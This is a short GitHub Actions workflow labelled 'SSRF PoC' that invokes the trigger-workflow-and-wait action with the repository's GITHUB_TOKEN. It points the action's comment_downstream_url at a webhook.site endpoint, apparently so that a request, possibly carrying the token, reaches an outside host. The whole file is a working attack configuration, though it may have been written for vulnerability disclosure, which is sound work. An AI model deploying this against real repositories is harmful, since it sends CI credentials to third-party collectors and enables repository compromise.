name: SSRF PoC
on: workflow_dispatch
jobs:
  poc:
    runs-on: ubuntu-latest
    steps:
      - uses: Whatnot-inc/trigger-workflow-and-wait@master
        with:
          owner: Whatnot-inc
          repo: trigger-workflow-and-wait
          github_token: ${{ secrets.GITHUB_TOKEN }}
          workflow_file_name: any.yml
          comment_downstream_url: https://webhook.site/3855ba4e-687d-4dff-958e-140b102b1a1a
